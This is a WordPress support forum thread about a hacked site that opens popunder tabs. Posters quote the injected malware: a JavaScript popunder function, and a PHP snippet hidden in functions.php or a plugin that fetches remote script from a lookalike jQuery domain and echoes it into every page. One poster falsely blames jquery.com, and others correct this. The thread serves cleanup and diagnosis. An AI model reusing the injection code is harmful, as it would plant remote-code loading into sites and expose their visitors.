Posted 11 months ago #
Hello,
Starting from today seems that i`ve got a problem. Every time i click on my site (http://i0n1ca.co.cc) on any link, opens me an annoying tab http://www.watchliveonline.org
I mention that i have not installed anything, like plugins, widgets.
I`ve wrote like 4-5 posts, thats it.
If anyone have a solution for this, please help. I just saw in an other thread that from now people ar starting to have this problem.
I'm now seeing more reports of this that suggest it's a new hack. You need to start working your way through these resources:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Additional Resources:
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
Posted 11 months ago #
Hey i0n1ca,
I have the same Problem. Now I believe I have found the error! You should look at your source code. Have you includet a library from http://jquery.com/?
if you look into this library since today there is a code like this in line 68!
function checkTarget(e)
{
if ( !getCookie('popundr') ) {
var e = e || window.event;
var win = doOpen('http://www.watchliveonline.org');
win.blur();
window.focus();
setcookie('popundr', 1, time() + (1 * 48 * 60 * 60))
}
}so i think its not a problem with your site ist a problem from http://jquery.com !
No! That is completely and utterly wrong!
@mcca: Your site has been hacked. Please follow all of the links posted above.
Posted 11 months ago #
@mcca
where is this file in the theme?
Posted 11 months ago #
@esmi you think my website has been hacked? No i dont think so! If you read my entry you would see that i have located the error, now I remove the file from http://jquery.com/ and all work well like before ;-)
@atendimento.setor
i dont now where it is located in your theme. Best solution is you get the plugin firebug for firefox an search for http://www.watchliveonline.org then you get the .js file. Then delete this in your template
@mcca: Now try browsing these forums and see just how many people had sites that were hacked repeatedly. And take note of the advice that they were given. Do you think we post this stuff for fun?
Posted 11 months ago #
@mcca that code does not come from jquery.org it comes from jquerys.org which is a malicious domain set up just to trick people into thinking they are loading a script from jquery.org. If the call to that script is in your theme then you have been hacked.
Also the malicious domain redirects to jquery.org unless the specific file is called.
Posted 9 months ago #
In functions.php delete the first line, and works like a charm!
Posted 8 months ago #
same stuff for me! There was
<?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
This code in a plugin jquerye.com :) check your websites cookie's if there is a cookie named "popundr" its same script they are generally using this one cuz its working at all browsers. just clear the line and you are rdy to go. oh and dont forget to clear your caches if you are using a cache plugin :)
You must log in to post.
